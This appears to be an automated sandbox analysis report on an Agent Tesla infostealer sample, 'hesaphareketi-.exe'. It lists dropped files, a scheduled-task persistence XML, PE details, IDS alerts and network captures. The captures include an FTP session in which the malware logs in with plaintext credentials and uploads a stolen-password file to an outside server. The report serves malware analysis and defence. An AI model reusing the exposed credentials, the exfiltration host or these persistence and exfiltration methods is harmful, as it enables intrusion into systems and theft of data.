                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sgar5f1t.g13.psm1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_szep01iy.4fk.psm1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w4zglblg.jqn.psm1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\tmpBF7D.tmp

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe
                                          File Type:XML 1.0 document, ASCII text
                                          Category:dropped
                                          Size (bytes):1586
                                          Entropy (8bit):5.104875849081153
                                          Encrypted:false
                                          SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt7xvn:cgergYrFdOFzOzN33ODOiDdKrsuTlv
                                          MD5:A7E38673D8D14C5D128FB599C014FACC
                                          SHA1:907D9D122F7B428002B302B33974AECF4B2C6776
                                          SHA-256:8C71EFAD2E48D1581934637F7DEE18FD8C5B98D9D4F56CFF1EC8953F4C334249
                                          SHA-512:DE5DD8C706C26832E0E141497C8B7D29E5E9CDFDDDB8E9573F5E2D74DAF088AF8C9E08CE0106242EC07D0418B36A3A3B05DAA3D097A4F70E964B0F1EAE8291A3
                                          Malicious:false
                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                                          C:\Users\user\AppData\Local\Temp\tmpE555.tmp

                                          Download File
                                          Process:C:\Users\user\Desktop\hesaphareketi-.exe
                                          File Type:XML 1.0 document, ASCII text
                                          Category:dropped
                                          Size (bytes):1586
                                          Entropy (8bit):5.104875849081153
                                          Encrypted:false
                                          SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt7xvn:cgergYrFdOFzOzN33ODOiDdKrsuTlv
                                          MD5:A7E38673D8D14C5D128FB599C014FACC
                                          SHA1:907D9D122F7B428002B302B33974AECF4B2C6776
                                          SHA-256:8C71EFAD2E48D1581934637F7DEE18FD8C5B98D9D4F56CFF1EC8953F4C334249
                                          SHA-512:DE5DD8C706C26832E0E141497C8B7D29E5E9CDFDDDB8E9573F5E2D74DAF088AF8C9E08CE0106242EC07D0418B36A3A3B05DAA3D097A4F70E964B0F1EAE8291A3
                                          Malicious:true
                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                                          C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe

                                          Download File
                                          Process:C:\Users\user\Desktop\hesaphareketi-.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):615936
                                          Entropy (8bit):7.968233699686794
                                          Encrypted:false
                                          SSDEEP:12288:662o7fX9fXw9/DFmZOfBXZfg86lIEd12cE/hSXpjfVtXhI6:nL9fAJ5SOfBpfz+IeM/hCJxI6
                                          MD5:D8AA0C3EAED283B8D78298748900F395
                                          SHA1:9899CC61CB992DCFE49A04F4A4209852713B4AB5
                                          SHA-256:CE51BC85FA9CF4A581DE693C5901E0C03FFF712C40F723009E393BAD1A18D014
                                          SHA-512:34F42B761DD7A8774F628BB43D50C75202262518DCBAD01D23FCCB3323621852895F6FB1102AF16F3E7863B13A6CEF295F0B00CA987E1F885CDEBA196A974944
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: Avira, Detection: 100%
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 53%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....g{f.................\...........z... ........@.. ....................................@..................................y..W.................................................................................... ............... ..H............text... Z... ...\.................. ..`.rsrc................^..............@..@.reloc...............d..............@..B.................y......H........A...8......q....<...............................................(.... .........%.+...(.....,... .........%.C...(.....D...(t...*.*..z.(......}.....(....o....}....*..0...........{............3.....(.....*..................0...........{......,....f.........}......}......}.......s....o....}.......}....8......{....o....}......{....}......}.............}.....{........Y}.....{....-...+H.{........{....X.{....X .;.|.{....Xa}......}.....{....on...:q....(....+..(........}.....

                                          C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe:Zone.Identifier

                                          Download File
                                          Process:C:\Users\user\Desktop\hesaphareketi-.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):26
                                          Entropy (8bit):3.95006375643621
                                          Encrypted:false
                                          SSDEEP:3:ggPYV:rPYV
                                          MD5:187F488E27DB4AF347237FE461A079AD
                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                          Malicious:true
                                          Preview:[ZoneTransfer]....ZoneId=0

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):7.968233699686794
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          • DOS Executable Generic (2002/1) 0.01%
                                          File name:hesaphareketi-.exe
                                          File size:615'936 bytes
                                          MD5:d8aa0c3eaed283b8d78298748900f395
                                          SHA1:9899cc61cb992dcfe49a04f4a4209852713b4ab5
                                          SHA256:ce51bc85fa9cf4a581de693c5901e0c03fff712c40f723009e393bad1a18d014
                                          SHA512:34f42b761dd7a8774f628bb43d50c75202262518dcbad01d23fccb3323621852895f6fb1102af16f3e7863b13a6cef295f0b00ca987e1f885cdeba196a974944
                                          SSDEEP:12288:662o7fX9fXw9/DFmZOfBXZfg86lIEd12cE/hSXpjfVtXhI6:nL9fAJ5SOfBpfz+IeM/hCJxI6
                                          TLSH:6DD4231587997273CB941D31EC32B58723B69223B692E7ADBDCC418B2B4738F45C6893
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....g{f.................\...........z... ........@.. ....................................@................................

                                          File Icon

                                          Icon Hash:00928e8e8686b000

                                          Static PE Info

                                          General

                                          Entrypoint:0x497a1a
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x667B6712 [Wed Jun 26 00:55:46 2024 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                          Entrypoint Preview

                                          Instruction
                                          jmp dword ptr [00402000h]
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x979c00x57.text
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x980000x590.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x9a0000xc.reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x20000x95a200x95c0096440072bf52e2862fc4d348f68d1139False0.9741137573038398data7.973890761853698IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rsrc0x980000x5900x600d69abbbef33a8bb8e75b6d59e33c3529False0.4231770833333333data4.391626965883615IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc0x9a0000xc0x2007e824d7cfd099b5cefde781cb3c97dc2False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          RT_VERSION0x980a00x33cdata0.4251207729468599
                                          RT_MANIFEST0x983dc0x1b4XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (433), with no line terminators0.5642201834862385

                                          Imports

                                          DLLImport
                                          mscoree.dll_CorExeMain

                                          Network Behavior

                                          Snort IDS Alerts

                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                          06/27/24-09:16:46.163921TCP2855542ETPRO TROJAN Agent Tesla CnC Exfil Activity4970662377192.168.2.5104.247.165.99
                                          06/27/24-09:16:49.864211TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil4970851041192.168.2.5104.247.165.99
                                          06/27/24-09:16:49.864211TCP2855542ETPRO TROJAN Agent Tesla CnC Exfil Activity4970851041192.168.2.5104.247.165.99
                                          06/27/24-09:16:46.163921TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil4970662377192.168.2.5104.247.165.99
                                          06/27/24-09:16:49.222300TCP2029927ET TROJAN AgentTesla Exfil via FTP4970721192.168.2.5104.247.165.99
                                          06/27/24-09:16:45.532746TCP2029927ET TROJAN AgentTesla Exfil via FTP4970521192.168.2.5104.247.165.99

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Jun 27, 2024 09:16:43.551198959 CEST4970521192.168.2.5104.247.165.99
                                          Jun 27, 2024 09:16:43.556152105 CEST2149705104.247.165.99192.168.2.5
                                          Jun 27, 2024 09:16:43.557033062 CEST4970521192.168.2.5104.247.165.99
                                          Jun 27, 2024 09:16:44.167622089 CEST2149705104.247.165.99192.168.2.5
                                          Jun 27, 2024 09:16:44.171499968 CEST4970521192.168.2.5104.247.165.99
                                          Jun 27, 2024 09:16:44.176255941 CEST2149705104.247.165.99192.168.2.5
                                          Jun 27, 2024 09:16:44.387965918 CEST2149705104.247.165.99192.168.2.5
                                          Jun 27, 2024 09:16:44.402182102 CEST4970521192.168.2.5104.247.165.99
                                          Jun 27, 2024 09:16:44.407018900 CEST2149705104.247.165.99192.168.2.5
                                          Jun 27, 2024 09:16:44.655033112 CEST2149705104.247.165.99192.168.2.5
                                          Jun 27, 2024 09:16:44.655534029 CEST4970521192.168.2.5104.247.165.99
                                          Jun 27, 2024 09:16:44.660388947 CEST2149705104.247.165.99192.168.2.5
                                          Jun 27, 2024 09:16:44.875209093 CEST2149705104.247.165.99192.168.2.5
                                          Jun 27, 2024 09:16:44.875372887 CEST4970521192.168.2.5104.247.165.99
                                          Jun 27, 2024 09:16:44.880362988 CEST2149705104.247.165.99192.168.2.5
                                          Jun 27, 2024 09:16:45.092597008 CEST2149705104.247.165.99192.168.2.5
                                          Jun 27, 2024 09:16:45.092858076 CEST4970521192.168.2.5104.247.165.99
                                          Jun 27, 2024 09:16:45.097764015 CEST2149705104.247.165.99192.168.2.5
                                          Jun 27, 2024 09:16:45.309797049 CEST2149705104.247.165.99192.168.2.5
                                          Jun 27, 2024 09:16:45.309916019 CEST4970521192.168.2.5104.247.165.99
                                          Jun 27, 2024 09:16:45.315133095 CEST2149705104.247.165.99192.168.2.5
                                          Jun 27, 2024 09:16:45.526901007 CEST2149705104.247.165.99192.168.2.5
                                          Jun 27, 2024 09:16:45.527528048 CEST4970662377192.168.2.5104.247.165.99
                                          Jun 27, 2024 09:16:45.532598019 CEST6237749706104.247.165.99192.168.2.5
                                          Jun 27, 2024 09:16:45.532685041 CEST4970662377192.168.2.5104.247.165.99
                                          Jun 27, 2024 09:16:45.532746077 CEST4970521192.168.2.5104.247.165.99
                                          Jun 27, 2024 09:16:45.539473057 CEST2149705104.247.165.99192.168.2.5
                                          Jun 27, 2024 09:16:46.162039995 CEST2149705104.247.165.99192.168.2.5
                                          Jun 27, 2024 09:16:46.163921118 CEST4970662377192.168.2.5104.247.165.99
                                          Jun 27, 2024 09:16:46.163921118 CEST4970662377192.168.2.5104.247.165.99
                                          Jun 27, 2024 09:16:46.168899059 CEST6237749706104.247.165.99192.168.2.5
                                          Jun 27, 2024 09:16:46.169488907 CEST6237749706104.247.165.99192.168.2.5
                                          Jun 27, 2024 09:16:46.169578075 CEST4970662377192.168.2.5104.247.165.99
                                          Jun 27, 2024 09:16:46.203802109 CEST4970521192.168.2.5104.247.165.99
                                          Jun 27, 2024 09:16:46.392327070 CEST2149705104.247.165.99192.168.2.5
                                          Jun 27, 2024 09:16:46.500658989 CEST4970521192.168.2.5104.247.165.99
                                          Jun 27, 2024 09:16:47.079363108 CEST4970721192.168.2.5104.247.165.99
                                          Jun 27, 2024 09:16:47.194102049 CEST2149707104.247.165.99192.168.2.5
                                          Jun 27, 2024 09:16:47.194222927 CEST4970721192.168.2.5104.247.165.99
                                          Jun 27, 2024 09:16:47.823898077 CEST2149707104.247.165.99192.168.2.5
                                          Jun 27, 2024 09:16:47.827640057 CEST4970721192.168.2.5104.247.165.99
                                          Jun 27, 2024 09:16:47.832493067 CEST2149707104.247.165.99192.168.2.5
                                          Jun 27, 2024 09:16:48.046286106 CEST2149707104.247.165.99192.168.2.5
                                          Jun 27, 2024 09:16:48.046772003 CEST4970721192.168.2.5104.247.165.99
                                          Jun 27, 2024 09:16:48.051624060 CEST2149707104.247.165.99192.168.2.5
                                          Jun 27, 2024 09:16:48.300241947 CEST2149707104.247.165.99192.168.2.5
                                          Jun 27, 2024 09:16:48.300947905 CEST4970721192.168.2.5104.247.165.99
                                          Jun 27, 2024 09:16:48.305933952 CEST2149707104.247.165.99192.168.2.5
                                          Jun 27, 2024 09:16:48.518785954 CEST2149707104.247.165.99192.168.2.5
                                          Jun 27, 2024 09:16:48.542098999 CEST4970721192.168.2.5104.247.165.99
                                          Jun 27, 2024 09:16:48.547076941 CEST2149707104.247.165.99192.168.2.5
                                          Jun 27, 2024 09:16:48.760163069 CEST2149707104.247.165.99192.168.2.5
                                          Jun 27, 2024 09:16:48.763032913 CEST4970721192.168.2.5104.247.165.99
                                          Jun 27, 2024 09:16:48.767927885 CEST2149707104.247.165.99192.168.2.5
                                          Jun 27, 2024 09:16:48.981028080 CEST2149707104.247.165.99192.168.2.5
                                          Jun 27, 2024 09:16:48.982683897 CEST4970721192.168.2.5104.247.165.99
                                          Jun 27, 2024 09:16:48.987554073 CEST2149707104.247.165.99192.168.2.5
                                          Jun 27, 2024 09:16:49.200829983 CEST2149707104.247.165.99192.168.2.5
                                          Jun 27, 2024 09:16:49.216226101 CEST4970851041192.168.2.5104.247.165.99
                                          Jun 27, 2024 09:16:49.221257925 CEST5104149708104.247.165.99192.168.2.5
                                          Jun 27, 2024 09:16:49.221358061 CEST4970851041192.168.2.5104.247.165.99
                                          Jun 27, 2024 09:16:49.222300053 CEST4970721192.168.2.5104.247.165.99
                                          Jun 27, 2024 09:16:49.231053114 CEST2149707104.247.165.99192.168.2.5
                                          Jun 27, 2024 09:16:49.863991022 CEST2149707104.247.165.99192.168.2.5
                                          Jun 27, 2024 09:16:49.864211082 CEST4970851041192.168.2.5104.247.165.99
                                          Jun 27, 2024 09:16:49.864278078 CEST4970851041192.168.2.5104.247.165.99
                                          Jun 27, 2024 09:16:49.869143009 CEST5104149708104.247.165.99192.168.2.5
                                          Jun 27, 2024 09:16:49.869420052 CEST5104149708104.247.165.99192.168.2.5
                                          Jun 27, 2024 09:16:49.869468927 CEST4970851041192.168.2.5104.247.165.99
                                          Jun 27, 2024 09:16:50.000675917 CEST4970721192.168.2.5104.247.165.99
                                          Jun 27, 2024 09:16:50.086592913 CEST2149707104.247.165.99192.168.2.5
                                          Jun 27, 2024 09:16:50.180342913 CEST4970721192.168.2.5104.247.165.99

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Jun 27, 2024 09:16:43.511660099 CEST5927653192.168.2.51.1.1.1
                                          Jun 27, 2024 09:16:43.543075085 CEST53592761.1.1.1192.168.2.5

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Jun 27, 2024 09:16:43.511660099 CEST192.168.2.51.1.1.10xf1adStandard query (0)ftp.normagroup.com.trA (IP address)IN (0x0001)false

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Jun 27, 2024 09:16:43.543075085 CEST1.1.1.1192.168.2.50xf1adNo error (0)ftp.normagroup.com.tr104.247.165.99A (IP address)IN (0x0001)false

                                          FTP Packets

                                          TimestampSource PortDest PortSource IPDest IPCommands
                                          Jun 27, 2024 09:16:44.167622089 CEST2149705104.247.165.99192.168.2.5220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 11 of 50 allowed.
                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 11 of 50 allowed.220-Local time is now 10:16. Server port: 21.
                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 11 of 50 allowed.220-Local time is now 10:16. Server port: 21.220-This is a private system - No anonymous login
                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 11 of 50 allowed.220-Local time is now 10:16. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 11 of 50 allowed.220-Local time is now 10:16. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                          Jun 27, 2024 09:16:44.171499968 CEST4970521192.168.2.5104.247.165.99USER admins@normagroup.com.tr
                                          Jun 27, 2024 09:16:44.387965918 CEST2149705104.247.165.99192.168.2.5331 User admins@normagroup.com.tr OK. Password required
                                          Jun 27, 2024 09:16:44.402182102 CEST4970521192.168.2.5104.247.165.99PASS ab+LNvim5PAo
                                          Jun 27, 2024 09:16:44.655033112 CEST2149705104.247.165.99192.168.2.5230 OK. Current restricted directory is /
                                          Jun 27, 2024 09:16:44.875209093 CEST2149705104.247.165.99192.168.2.5504 Unknown command
                                          Jun 27, 2024 09:16:44.875372887 CEST4970521192.168.2.5104.247.165.99PWD
                                          Jun 27, 2024 09:16:45.092597008 CEST2149705104.247.165.99192.168.2.5257 "/" is your current location
                                          Jun 27, 2024 09:16:45.092858076 CEST4970521192.168.2.5104.247.165.99TYPE I
                                          Jun 27, 2024 09:16:45.309797049 CEST2149705104.247.165.99192.168.2.5200 TYPE is now 8-bit binary
                                          Jun 27, 2024 09:16:45.309916019 CEST4970521192.168.2.5104.247.165.99PASV
                                          Jun 27, 2024 09:16:45.526901007 CEST2149705104.247.165.99192.168.2.5227 Entering Passive Mode (104,247,165,99,243,169)
                                          Jun 27, 2024 09:16:45.532746077 CEST4970521192.168.2.5104.247.165.99STOR PW_user-960781_2024_06_27_03_16_42.html
                                          Jun 27, 2024 09:16:46.162039995 CEST2149705104.247.165.99192.168.2.5150 Accepted data connection
                                          Jun 27, 2024 09:16:46.392327070 CEST2149705104.247.165.99192.168.2.5226-File successfully transferred
                                          226-File successfully transferred226 0.230 seconds (measured here), 1.36 Kbytes per second
                                          Jun 27, 2024 09:16:47.823898077 CEST2149707104.247.165.99192.168.2.5220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 12 of 50 allowed.
                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 12 of 50 allowed.220-Local time is now 10:16. Server port: 21.
                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 12 of 50 allowed.220-Local time is now 10:16. Server port: 21.220-This is a private system - No anonymous login
                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 12 of 50 allowed.220-Local time is now 10:16. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 12 of 50 allowed.220-Local time is now 10:16. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                          Jun 27, 2024 09:16:47.827640057 CEST4970721192.168.2.5104.247.165.99USER admins@normagroup.com.tr
                                          Jun 27, 2024 09:16:48.046286106 CEST2149707104.247.165.99192.168.2.5331 User admins@normagroup.com.tr OK. Password required
                                          Jun 27, 2024 09:16:48.046772003 CEST4970721192.168.2.5104.247.165.99PASS ab+LNvim5PAo
                                          Jun 27, 2024 09:16:48.300241947 CEST2149707104.247.165.99192.168.2.5230 OK. Current restricted directory is /
